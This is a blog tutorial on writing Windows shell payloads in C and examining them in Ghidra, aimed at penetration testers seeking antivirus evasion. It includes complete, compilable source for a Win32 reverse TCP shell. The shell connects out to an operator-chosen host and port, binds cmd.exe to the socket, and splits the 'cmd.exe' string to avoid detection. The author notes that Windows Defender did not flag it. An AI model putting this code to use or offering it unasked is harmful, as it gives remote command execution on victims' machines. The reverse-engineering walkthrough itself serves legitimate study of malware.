Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow

Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems

In this article, we’ll go over some example C code that is Windows x86 compatible and analyze binaries using Ghidra to help you write or improve upon your shell code skills by creating the payload first. The practical applications of malware analysis and reverse engineering efforts can help penetration testers improve their evasion techniques and achieve command execution on systems without Linux (or ported) tools against Windows systems. We’ll examine samples using native windows libraries, compilers, C based shell payload, and Metasploit (MSFvenom) payload for Windows. Are you ready? Let’s dive right in!

Disclaimer: The methods, code examples, and techniques mentioned throughout this article for educational purposes only.. The author takes no responsibility for any unauthorized activities performed using the information in this article. All code or compiled binaries are provided ‘as is’ with no expressed warranty.

Feel free to download and install these tools and follow along in the article to practice your win32-ninja shell code skills with us.

Tools in Use:

Writing your first Win32 Compatible Shell Payload in C

Many cyber security professionals (including myself) aren’t experts in shell code creation nor the ancient C language. So when we do pen testing engagements; are go-to tool for shell payloads almost always includes Metasploit and specifically running either MSFVenomVeil, and or some other C2 frameworks (in a post Empire world) that generates the desired shell code for you. But these solutions, like any pre-made template aren’t always perfect and many vanilla payloads produced are caught by endpoint security solutions.

So why not write our own? Many tutorials you see focus on compiling or writing payloads for Linux. If we’re compromising and pivoting between Windows systems, we need to step it up. So let’s get our first C-code template ready to go down below:

	#include <stdlib.h>	//to use system()
	int main()
	{
		char command[100] = "calc.exe";
		system(command); //executes the calc.exe native path file
	

		return 0;
	}

In the above you see one of the simplest 'cmd only' forms of shell payload. It's not a full shell, but it's a starter template that uses native standard libraries so you can execute an external system call that will honor the Windows System32 directory path. It's quite obvious what happens in the above snippet.

Note: This payload is detected as 'malware' from Chrome and Google Drive services. Windows defender at the time of this writing on Windows 10 does not flag the compiled binary.

No alt text provided for this image

You might be wondering "who cares" in the above template. It serves as a base for us to compile this to a binary and examine a very simple way to begin reverse engineering a standard portable executable and get you comfortable with navigating Ghidra for finding functions, and tracing references and variables to the decompiler window as we see coming up.

Compile Your C Shell Payload in Windows

In our example template; we'll use Visual Studio (VS) since it's got nice colors and a GUI to make it easy to showcase. You can also use the common 'MSBuild' method by including the C file in an XML template that can be compiled that is native on most workstations. But let's use VS because I have screenshots.

No alt text provided for this image

Create a new project for a Win32 Console application. Ensure you've got the C++ extension installed. After the default solution files are generated, right click on the solution explorer and add a new source file. Instead of adding a C++ file with the extension (.cpp) call it (.c). The VS compiler will use the appropriate language compiler based on your extension.

Now paste your C source code, and you'll notice that if you try to build the solution; you may receive an error regarding the main function already been represented in another file. You'll have to remove (disable) the original default C/++ file from the project solution so the compiler knows you won't use it as shown below:

No alt text provided for this image

Now that we've prepped the environment you can compile and build the solution. If you hit 'Crtl+F5' it'll execute the binary as well and you'll see calc.exe pop up. If you're like me; you may have started 'modifying' the shell code by adding different enhancements to try to make it more useful. Note that the use of insecure classic functions that include potential buffer overflow conditions will show up as errors or warnings and prevent the build. You'll need to instruct the compiling pre-processor to ignore these like so in the below image:

No alt text provided for this image

To do so, right click on your C file in solution explorer and set the configuration properties under 'preprocessor'. Edit the macros and add in (case sensitive) the warning bypass macros to the definitions field. Copy and paste the snippet below if you are running into this issue:

_CRT_SECURE_NO_WARNINGS
_CRT_SECURE_NO_DEPRECATE
_CRT_NONSTDC_NO_DEPRECATE
_WINSOCK_DEPRECATED_NO_WARNINGS

Congratulations, you've compiled your first Win32 C-source shell code. Let's analyze the binary in Ghidra so you can get a feel for what the code decompile looks like when you DON'T have the source code. For example, if you managed to isolate a sweet piece of malware that did not get detected and you want to mimic its TTP's.

Using Ghidra to Search and Decompile

In this section, we're going to import the binary into Ghidra and start exploring the varying structure of the our original C shell code so we can identify the main() function, when variables are loaded, and the system() execution and compare it to our source code.

When you first load the binary into Ghidra, you'll want to use the default 'automatic analysis' settings (select YES) before you get to the main screen. From the main view, find the left panel under functions/symbols and discover the 'entry' point as often you won't see the main() function properly parsed.

No alt text provided for this image

Hit up the 'entry' icon in the symbol tree (functions) menu towards your bottom left pane and click on it. Your main code viewer window will jump to the entry point of when the program begins to execute your main function.

No alt text provided for this image

Also note to the right in the decompiler pane, is a familiar looking main() structure that's been labeled a function and your computer's memory address followed by the return. We'll rename this to main() by right clicking on the function label. This denotes our main structure of our code.

No alt text provided for this image

You can further explorer other functions from DLL imports potentially called and non-obfuscated strings by examining the symbols tree (if the binary wasn't already stripped). Since we already know from our source code, let's look for 'calc.exe' since we know that's what we executed in the payload. *Yes, I know: You don't have that luxury examining other pieces of malware or binary shell payloads; we'll examine how to trace and map functions more effectively in our upcoming examples. Hold Tight!*

No alt text provided for this image

Double clicking on the location address in the string search window calc will jump us to the data segment (DS) section. To our highlighted right (in yellow); we also see local variables in the de-compiler being listed and pushed onto the stack. If you look carefully, it is indeed for Win32 x86 Intel architecture as the bytes are stored in little endian. It's also 4 bytes across as a proper word value (though we reference this as DWORD in Windows) of 32 bits as validated by converting the hex below:

No alt text provided for this image

The careful analyst will also observe the varying system call related functions surrounding our string pushed onto the stack. Lets take a closer look:

No alt text provided for this image

What you see above is the subroutines in the main function. We see the data 'calc.exe' being pushed onto the stack frame and set in memory by 'memset()' followed by our famous 'system()' call. Since this is an imperfect de-compile of the C code, we reference the library methods to see how the actual structure of the source might look like (if we didn't already have the source code):

// C program to demonstrate working of memset() 
#include <stdio.h> 
#include <string.h> 
  
int main() 
{ 
    char str[50] = "GeeksForGeeks is for programming geeks."; 
    printf("\nBefore memset(): %s\n", str); 
  
    // Fill 8 characters starting from str[13] with '.' 
    memset(str + 13, '.', 8*sizeof(char)); 
  
    printf("After memset():  %s", str); 
    return 0; 
} 

In the above eample from GeeksforGeeks.org site we see that memset was explicitly called but in our code, it was simply implied after setting up the construct and variable: "char command[100] = "calc.exe";" like so. In the documentation it says memset is indeed filling our buffer into memory. Now let's get to the actual 'evil' execution of our intended payload via system().

// A C++ program that pauses screen at the end in Windows OS 
#include <iostream> 
using namespace std; 
int main () 
{ 
    cout << "Hello World!" << endl; 
    system("pause"); 
    return 0; 
} 

In the above the external reference also shows how system() syntax is used and it simply takes in a string argument and we see our standard return statement from the routine.

Examining a more complex sample (reverse_tcp_shell)

In this next example, we will examine slightly modified version of a reverse tcp shell payload written in C and designed to compile and run natively for Win32. Unlike vanilla msfvenom and other non-tuned payloads; the endpoint (antivirus) may detect such shell code. The original shell.c is found here where there's a few typos that needed adjusting. The author is "Yahav N. Hoffmann" written in 2016 but still wasn't alerted (compiled) by my Windows Defender in May of 2020 in Windows 10! Amazing what custom shell coding can do. Some of his methods are similarly demonstrated in another piece of shell code authored by 'paranoidninja' and that is located here (if you wish to read more on the evasion techniques).

No alt text provided for this image

And yes, the code works as shown in my PCAP runtime below:

No alt text provided for this image

For now, use the one I have hosted in my Github for the purposes of my demonstration and syntax corrected compiling ease. Here's our code template to reference from:

//Another great template can be found here
//https://0xdarkvortex.dev/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/


//Original location
//https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c
/* Windows Reverse Shell
Test under windows 7 with AVG Free Edition.
Author: Ma~Far$ (a.k.a. Yahav N. Hoffmann)
Writen 2016 - Modified 2016
This program is open source you can copy and modify, but please keep author credit!
Made a bit more stealthy by infoskirmish.com - 2017
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32") //dc401 corrected typo of w2 to ws2

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char aip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;


int main(int argc, char* argv[])
{
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	if (argv[1] == NULL) {
		exit(1);
	}

	struct hostent* host;
	host = gethostbyname(argv[1]);
	strcpy(aip_addr, inet_ntoa(*((struct in_addr*)host->h_addr)));

	hax.sin_family = AF_INET;
	hax.sin_port = htons(atoi(argv[2]));
	hax.sin_addr.s_addr = inet_addr(aip_addr);

	WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
	if (WSAGetLastError() == 0) {

		memset(&ini_processo, 0, sizeof(ini_processo));

		ini_processo.cb = sizeof(ini_processo);
		ini_processo.dwFlags = STARTF_USESTDHANDLES;
		ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

		char* myArray[4] = { "cm", "d.e", "x", "e" };
		char command[8] = "";
		snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

		CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
		exit(0);
	}
	else {
		exit(0);
	}
}

That looks exciting, we have attempted 'cmd.exe' evasion by splitting it into an array of format strings and then concatenating them later; we also have if/else branching conditions and CLI level arguments we can process. Now that we've examined the code. What does it look like under a decompiler assuming we don't have it?

Open up Ghidra again and let's hit up the entry point, identify the main() function and begin tracing are functions down the rabbit hole. *Don't worry, we won't be 'cheating' and specific string searches. We will examine the symbols and strings for any interesting keywords though.

No alt text provided for this image

Wow, that's alot of unique strings and good information about the variables and function uses in the data segment (DS) of our binary. Do you recognize the famous "%s%s%s%s" in sets of (4 bytes or 32 bits)? I hope you do! But let's get more realistic and start thinking how we can examine the decompiled pseudo code in Ghidra. Let's open up the function map window similar to how you would do it with 'space bar' in IDA Pro or x64dbg Graph View.

No alt text provided for this image

If you do a side-by-side comparison you can see the conditional statements, and potential loops from our source code and the graph view. This will help you determine where there might be subroutines used and also focus on true/false conditions that you'll want to investigate for creating a fork or a patch to some C code. Another tool that we can use is commonly called 'references' which is commonly called (xref with the 'x' hot key in IDA).

This lets you map functions or variables that have been called or mentioned in other functions or portions of the code. As you can imagine, jumping in and out of varying functions can get very complex fast! So for pure shell code payload that is compiled, it's best to start top down from the OEP and main() function and dig into what would likely be used such as system calls and socket creations. The great thing about Ghidra is that it visualizes this for you if you 'right click' and scroll to the references sub-menu and select the open call tree option.

No alt text provided for this image

In the above, I've highlighted the function call tree windows for incoming and outgoing calls. relative to our main() function that we renamed earlier. You'll also notice lots of 'XREF' or referenced mentions to the same function (main) memory address space and their appropriate IO in memory (Read/Write in colors). What's also very interesting are all the identified native windows C functions and their outgoing calls. Given that we have a reverse shell, I might be inclined to start investigating the WSASocketW calls first.

But, before we do that, remember when we discussed format strings? Let's revisit that code comparison and how it also looks in the C decompiler once more with rigor:

No alt text provided for this image

In the above, we side by side compare our original source to the decompiler window and we see clues that Ghidra couldn't parse the snprintf() function as easily. Even still, this gives you clues to which functions might be used based on the data arguments. Before leaving the screen, take note of the CreateProcess function which is not C specific, but actually Windows specific and note how it wasn't decoded. Other solutions such as IDA Pro might already have this decoded for you; but learning to write shell code from scratch in C; this is great practice for your API research skills.

No alt text provided for this image

In our last portion of this example; we examine another portion of our shell code construct. It takes (2) arguments, an IP and port according to our source code. Notice in the decompiler Ghidra gets very close to showing you the useful syntax and the number of arguments. We also know that this is part of the main function as we see it is very close and loaded position right after the entry point of the application.

What about the metasploit payloads from msfvenom?

We don't have any screenshots of our examination of the basic windows (non staged) bind shell and reverse TCP shells. However, when we examined it under Ghidra; you really get a sense of just how much work the teams at Rapid7 and the security community for the Metasploit framework have put in to making them difficult to detect and robust in their error and condition handling.

We weren't able to easily jump between sections and show case easy C structure and functions to reference (which is honestly, kind of good for AV detection anyways) after exporting (using -f exe from msfvenom). What this means is that you as a seasoned pen tester need to practice DFIR and REM skills. I've personally enjoyed my GREM certification and it complements the GXPN very well in exercising skills to be able to develop shellcode on your own.

Closing

I hope you've enjoyed a little preview into how power Ghidra is and how you can exercise malware analysis and reverse engineering skills to complement and take your shell code writing skills to the next level for windows systems. There's so much more reading that is available for those wanting to extend their knowledge beyond this article. I encourage you to visit the links below in your spare time. As always, if you enjoyed what you saw here.

Feel free to follow, clap, like or send me general feedback. If your organization is in need of an MSSP or other security subject matter expertise; find us online at www.scissecurity.com

Additional Resources and Examples

There’s more reading if you wish to learn more and have more templates to choose your initial reversing from. You aren’t just limited to analyzing C based payloads; there’s many other payloads and solutions that can you can gather more ideas from.

Using Slack as a C2 Channel

Analyzing meterpreter payload with Ghidra

MultiOS Reverse Shell made in .NET (you can always use dotpeek to decompile the code if you only have a binary because .NET is middlware language)

MSbuild XML Template for Shellcode (C source ready)

Compile C code entirely from Windows CLI

Original link: https://www.linkedin.com/pulse/analyze-binaries-ghidra-write-shell-code-c-dennis-chow-mba/?trackingId=ByQoAw2HSqeq3%2FZAPduuAg%3D%3D

Please note: All future articles will be on Medium. Please follow https://medium.com/@dw.chow for updates.

June 23, 2020
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013

Privacy Preference Center

Necessary

Cookies that are necessary for the site to function properly. This includes, storing the user's cookie consent state for the current domain, managing users carts to using the content network, Cloudflare, to identify trusted web traffic. See full Cookies declaration

gdpr, PYPF, woocommerce_cart_hash, woocommerce_items_in_cart, _wp_wocommerce_session, __cfduid [x2]

Performance

These are used to track user interaction and detect potential problems. These help us improve our services by providing analytical data on how users use this site.

_global_lucky_opt_out, _lo_np_, _lo_cid, _lo_uid, _lo_rid, _lo_v, __lotr
_ga, _gid, _gat, __utma, __utmt, __utmb, __utmc, __utmz
vuid

Marketing


tr, fr
ads/ga-audiences